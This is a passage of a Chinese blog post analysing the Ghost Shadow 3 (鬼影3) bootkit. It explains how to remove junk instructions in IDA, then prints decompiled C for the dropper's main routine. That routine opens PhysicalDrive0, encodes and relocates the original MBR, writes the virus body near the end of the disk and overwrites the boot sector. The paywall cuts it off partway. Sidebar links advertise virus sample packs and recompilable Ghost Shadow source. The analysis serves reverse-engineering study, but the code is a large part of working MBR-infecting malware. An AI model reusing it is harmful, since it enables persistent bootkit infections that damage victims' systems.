鬼影3样本ASM2C(mb.exe + hello_tt.sys)

最新推荐文章于 2016-10-05 13:46:49 发布
最新推荐文章于 2016-10-05 13:46:49 发布
阅读量1.1w 收藏 6
点赞数 3
分类专栏: Win32病毒 文章标签: c byte object command buffer disk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gaara_fan/article/details/6589324
版权
本文分析了鬼影3病毒的样本,包括去除mb.exe中的花指令,重点探讨HookStartIO部分,该部分将写操作转换为读操作以防止病毒被覆盖。文章还提供了关键代码和IRP_MJ_SCSI的SCSI资料链接,帮助理解病毒行为。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

    好吧,蛋疼的考试已经结束了,暑假除了看论文之外没其他任务,这两天跟老板开完总结会议之后再看看要什么时候回家..老妈以为我暑假不回,这两天一直打电话想做说服工作-___-

    现在有点小困,不多做吐槽了.下午晚饭时间群里三哥又发福利,发了鬼影3的样本.晚上从吃完饭开始就一直再看.瞄的,HookStartIO部分真心看不懂.等再请教下人了.纯静态分析的人儿你们伤不起啊~~

    mb.exe里面加了花指令,在三哥的提示和自己研究下,总算顺利用上F5,提供一下给兄弟们参考吧(度娘关键字:鬼影3去花指令)

    在_main函数里面,有6处花指令,分别是0041164D, 00411695, 004116C6, 00411804, 0041184C, 0041187D.如图是41164D的,处理流程都一样,在那句JMP上面按U键取消IDA已经进行的分析,然后跳过一个字节,在第二个直接处按C键,这样就能够看到正常的代码,如果要用F5,需要把那个跳过的字节修改为0x90,也就是nop指令.里面花指令容易分辨,jb和jnb合起来就是jmp,跳转是跳转到41164E的地址,然后在jnb的指令后嵌入一句DB E9之类的,这些如果使用OD是可以观察出来的.在F5的时候如果遇到提示wrong basic type sizes in compiler settings则在Options->Complier里面设置sizeof(bool)为4个字节就可以了.

    

    下面是代码:

/*++
@file  Mb_exe.c
@auth   GaA.Ra
@date  2011.7.6
--*/

int __cdecl main(int argc, const char **argv, const char **envp)
{
	int result; // eax@3
	char MBREncodeByte; // al@12
	char VirusDecodeByte; // al@24
	HANDLE hFile; // [sp+Ch] [bp-250h]@30
	HANDLE hDrive; // [sp+14h] [bp-248h]@1
	unsigned int i; // [sp+18h] [bp-244h]@7
	unsigned int j; // [sp+18h] [bp-244h]@19
	unsigned int k; // [sp+18h] [bp-244h]@25
	BOOL bSuccess; // [sp+1Ch] [bp-240h]@1
	DWORD NumberOfBytesWritten; // [sp+30h] [bp-22Ch]@1
	__int64 DiskGeometry.Cylinders; // [sp+34h] [bp-228h]@1
	int DiskGeometry.MediaType; // [sp+3Ch] [bp-220h]@1
	unsigned int DiskGeometry.TracksPerCylinder; // [sp+40h] [bp-21Ch]@1
	unsigned int DiskGeometry.SectorPerTrack; // [sp+44h] [bp-218h]@1
	unsigned int DiskGeometry.BytesPerSector; // [sp+48h] [bp-214h]@1
	unsigned __int64 VirusOffsetOfBytes; // [sp+4Ch] [bp-210h]@1

	//这里可以看做Buffer[512],v20,v21等是对Buffer里面特定位置的数据进行操作
	char Buffer; // [sp+54h] [bp-208h]@1
	char v20; // [sp+55h] [bp-207h]@1
	char v21; // [sp+204h] [bp-58h]@7
	__int16 v22; // [sp+251h] [bp-Bh]@1
	char v23; // [sp+253h] [bp-9h]@1
	unsigned __int64 lDistanceToMove; // [sp+254h] [bp-8h]@1

	NumberOfBytesWritten = 0;
	VirusOffsetOfBytes = 0i64;
	// typedef struct _DISK_GEOMETRY 
	// {
	//   LARGE_INTEGER Cylinders;
	//   MEDIA_TYPE MediaType;
	//   DWORD TracksPerCylinder;
	//   DWORD SectorsPerTrack;
	//   DWORD BytesPerSector;
	// } DISK_GEOMETRY;
	// DISK_GEOMETRY DiskGeometry;
	DiskGeometry.Cylinders = 0i64;
	DiskGeometry.MediaType = 0;
	DiskGeometry.TracksPerCylinder = 0;
	DiskGeometry.SectorPerTrack = 0;
	DiskGeometry.BytesPerSector = 0;
	lDistanceToMove = 0i64;
	Buffer = 0;
	memset(&v20, 0, 0x1FCu);
	v22 = 0;
	v23 = 0;
	hDrive = CreateFileA("\\\\.\\PhysicalDrive0", 0xC0000000u, 3u, 0, 3u, 0, 0);

	// #define 
	// CTL_GET_DISK CTL_CODE( \
	//   FILE_DEVICE_DISK,    \
	//   IOCTL_DISK_GET_DRIVE_GEOMETRY, \
	//   METHOD_BUFFER, \
	//   FILE_ANY_ACCESS)
	// &DiskGeometry.Cylinders equ DISK_GEOMETRY Struct
	// DISK_GEOMETRY DiskGeometry
	// 得到一个DISK_GEOMETRY结构体,从而获取磁盘相关信息
	bSuccess = DeviceIoControl(hDrive, CTL_GET_DISK, 0, 0, &DiskGeometry, 0x18u, &NumberOfBytesWritten, 0);
	if ( hDrive != (HANDLE)-1 && bSuccess )
	{
		//病毒写入磁盘的位置,字节为单位
		VirusOffsetOfBytes = DiskGeometry.Cylinders
			* DiskGeometry.TracksPerCylinder
			* DiskGeometry.SectorPerTrack
			* DiskGeometry.BytesPerSector
			- 0x34800
			+ 0x200;
		if ( DiskGeometry.Cylinders
			* DiskGeometry.TracksPerCylinder
			* DiskGeometry.SectorPerTrack
			* DiskGeometry.BytesPerSector )
		{
			if ( ReadFile(hDrive, &Buffer, 0x200u, &NumberOfBytesWritten, 0) )
			{
				memcpy(OriginateEncodeMBR, &Buffer, sizeof(OriginateEncodeMBR));
				memcpy(PartitionTableAndOther, &v21, 0x50u);// 0x1B0 - EndOfMBR
				VirusOffsetOfSectors = VirusOffsetOfBytes / 0x200;

				//复制原始MBR并进行简单的加密(循环左移3位)
				for ( i = 0x2600u; i < 0x2800; ++i )
				{
					if ( VirusContent[i] )                // VirusContent[0x2600] equ OriginateEncodeMBR
					{
						MBREncodeByte = __ROL__(VirusContent[i], 0x73u);// __asm rol; rol Byte, 3(0x73%8)
						VirusContent[i] = MBREncodeByte;
					}
				}
				lDistanceToMove = VirusOffsetOfBytes;
				if ( SetFilePointer(hDrive, VirusOffsetOfBytes, (PLONG)&lDistanceToMove + 1, 0) != -1 )// SetFilePointer to VirusOffsetOfBytes
				{
					// Copy VirusContent[0x200 - 0x2800] to disk
					// OriginateMBR(Encode) is at the last 0x200 bytes
					if ( WriteFile(hDrive, &VirusContent+0x200, 0x2600u, &NumberOfBytesWritten, 0) )
					{
						lDistanceToMove = 0i64;
						if ( SetFilePointer(hDrive, 0, (PLONG)&lDistanceToMove + 1, 0) != -1 )
						{
							if ( WriteFile(hDrive, VirusContent, 0x200u, &NumberOfBytesWritten, 0) )// VirusContent[0x0 - 0x200] equ VirusMBR
							{
								lDistanceToMove = VirusOffsetOfBytes + 0x2600;
								// SetFilePointer to VirusOffsetOfByte + 0x2600
								//
最低0.47元/天 解锁文章
鬼影3样本MBR详细注释(好吧,继续友情赠送磁盘布局..)
GaA.Ra的自留地 in Csdn
07-08 8568
好吧,写一个好的病毒确实是一门艺术,但是现在已经很少有人在坚持这个了.      今天下午开例会,老板宣布正式放假了,暑假宿舍没空调,结果老板说,可以去她办公室,啊哈哈哈哈哈.我决定坚持留下来学习了>_      吐槽能力下降,难道是因为两天没看银魂么...阿西啊~~~      入正题,注释写很多啦我就不多费口舌啦.鬼影3还是很亮的,神马加花指令啊,自解码的都用上了.哥喜欢..
关于core_cm3.c和core_cm3.h,Core_cmFunc.h 和 Core_cmInstr.h的理解
liming0931的专栏
12-09 3586
以下来自:https://blog.csdn.net/guosir_/article/details/78627980 CMSIS是Cortex微控制器软件接口标准(CortexMicroController Software Interface Standard)的缩写,这个是ARM定制的一个用于Cortex-M系列的一个标准,主要是为了提供通用api接口来访问内核和一些片上外设,提高代码的可移植性。 CMSIS有三个层:核内外设访问层CorePeripheral Access Layer(CPAL)
偶遇鬼影病毒nat.exe
Purpleendurer@优快云
12-31 2290
  一位朋友的电脑最近出现问题:浏览器首页被hxxp://www.i2255.com劫持,无法打开QQ空间,一些安全软件厂商的网站无法打开;桌面上有一个淘宝网图标,用桌面清理向导也无法删除。请偶帮忙处理。
鬼影病毒分析报告
weixin_34233679的博客
03-18 249
鬼影病毒分析报告一、 鬼影病毒概述这是一个***下载器,使用了ring3恢复内核钩子、感染磁盘引导区(MBR)、多种方法结束杀毒软件等 技术自启动并对抗杀毒软件。完全感染后,是一个看不到可疑文件、没有启动项、普通重装系统也无法解决的顽固病毒。 二、鬼影病毒分析1 病毒的启动方法感染MBR以获得凌驾于操作系统的启动权----&gt;HOOK文件操作中断,搜索NTLDR文件(主要目标xp,2003系统...
鬼影病毒
杨航的专栏
08-13 6522
今天和明天是最后两天宿舍有空调的日子啦,暑假宿舍没空调啊,悲催T__T      好吧,今天是最精华的部分啦对于鬼影3的分析,剩下的都是浮云啦,alg.exe不准备分析了,能用OD调试的货.分析起来只是时间问题.但是MBR和之后的保护模式的代码就不一样啦同学们,纯静态分析,伤不起啊,各种硬编码,自修改!T__T     今天给出3份东西,包括1,详细注解;2,一个对磁盘病毒加密内容进行解密的程
病毒下载 病毒样本
热门推荐
黑色雨滴
12-03 2万+
  简介:A-Z开头病毒样本打包下载,压缩文件内约7159个文件,约3573个病毒!看看各种杀毒软件能查出几个。验证一下查杀病毒的真正能力吧。仅供研究之用! 压缩包里面全部是病毒程序,千万不要解压运行。用你的杀毒软件查这个压缩包,如果查出的病毒数少于3542个的话,你还是换换杀毒软件吧。...
PKCS11.7 gzip.exe asm.zip MsVSVC++1.52.7z
07-24
PKCS11.7 + gzip.exe + asm.zip + MsVSVC++1.52.7z 博客: http://write.blog.csdn.net/postedit/7777369 用到的资源
kmod-oracleasm-2.0.6.rh1-3.el6.x86_64.rpm
04-30
Oracle ASM(Automatic Storage Management)是Oracle数据库系统中的一个组件,用于提供高效、自动化的存储管理功能。在Linux环境中安装Oracle 11g数据库时,ASM是必不可少的一部分,它可以帮助管理员轻松管理和配置...
kmod-oracleasm-2.0.6.rh1-2.el6.x86_64.rpm
12-17
kmod-oracleasm-2.0.6.rh1-2.el6.x86_64.rpm
鬼影病毒
guangyinglanshan的博客
10-05 2788
鬼影病毒是指寄生在磁盘主引导记录(MBR),即使格式化重装系统,也无法清除的病毒。 2010年3月15日,国内某安全中心发现一种被命名为“鬼影”的电脑病毒,由于该病毒成功运行后,在进程中、系统启动加载项里找不到任何异常,同时即使格式化重装系统,也无法彻底清除该病毒。犹如“鬼影”一般“阴魂不散”,所以称为“鬼影病毒“。该病毒也因此成为国内首个“引导区下载者病毒”。 据金山安全实验室工程师说,
鬼影下载者源代码MBR
01-18
采用感染VBR的技术进行自启动,在文件系统中并不产生任何文件,因此也不需要进行隐藏进程、隐藏驱动等工作,在实战工作中更好的保护自已不被发现。我们采用HTTP的方式将用户的木马主体文件下载下来并运行(下载至内存并运行),这样用户只需要专注于木马的功能性,而不用考虑木马的隐藏性、持久性。
鬼影下载者代码
12-18
鬼影下载者源码MBR寄存方法及更新MBR的方法。
鬼影下载者代码 汇编
04-01
鬼影下载者代码 汇编 可以绕过操作系统的病毒的代码研究
最新鬼影病毒专杀工具
03-21
金山安全实验室已经出了鬼影病毒专杀工具,可查杀鬼影病毒!
如何清除鬼影病毒 病毒利用硬盘MBR的代码漏洞
11-26
这段时间来,“鬼影”病毒颇为盛行。这个病毒利用硬盘MBR的代码漏洞,将病毒体的一部分放到硬盘的MBR扇区,致使病毒在系统启动前就加载,常规方法没办法清除。
用友与鬼影病毒
似水无痕
06-16 873
昨天一客户打电话,说软件无法登陆。上门查看现象如下:用友服务无法启动,双击启动,报错:本地计算机上的用友通服务启动后又停止了。一些服务自动停止,如果它们没有什么可做的,例如性能和日志警报服务。(真TMD经典的报错!)顺手看了一下uf2000.log,其中写着:得到连接串时不能创建ADO连接对象,可能是ADO安装不正确客户电脑环境:OS:WinXP SP2数据库:SQL 2000SP4 个人版软件:
鬼影”病毒
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
07-17 1793
3月15日,金山安全实验室捕获一种被命名为“鬼影”的电脑病毒,该病毒寄生在磁盘主引导记录(MBR),即使格式化重装系统,也无法将该病毒清除。当系统再次重启时,该病毒会早于操作系统内核先行加载。而当病毒成功运行后,在进程中、系统启动加载项里找不到任何异常,病毒就象“鬼影”一样在中毒电脑上“阴魂不散”。“鬼影”病毒也因此成为国内首个“引导区”下载者病毒。 鬼影病毒特征——重装系统也杀不掉   以前
逆向整理包编译通过版鬼影3.0代码~
赫的BLOG
01-06 753
话说,样本真操蛋~到处是花~~那个下载体Alg.exe我就不逆了~ 逆完在VMWARE测试发现很多bug,很多bug啊~ 修改,修改去把bootloader改的bug不多了~,PmVirus里肉眼可见的也改了不少了~但是还是开机卡住~不过从IDA里看没问题~纠结有boot调试环境的人来再改改吧~ 开源,发代码,是我的习惯~有实力改改做坏事的人请自己淡定~ 加个参考资料链接 http:
AIX 6.1 + RAC 11.2.0.1 + ASM 安装详解与新特性介绍
本文档是一份详细的AIX 6.1版本与RAC (Real Application Cluster) 11.2.0.1版本以及ASM (Automatic Storage Management) 的安装指南。作者在2010年记录了安装过程,主要涵盖了以下几个关键知识点: 1. **环境准备**...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值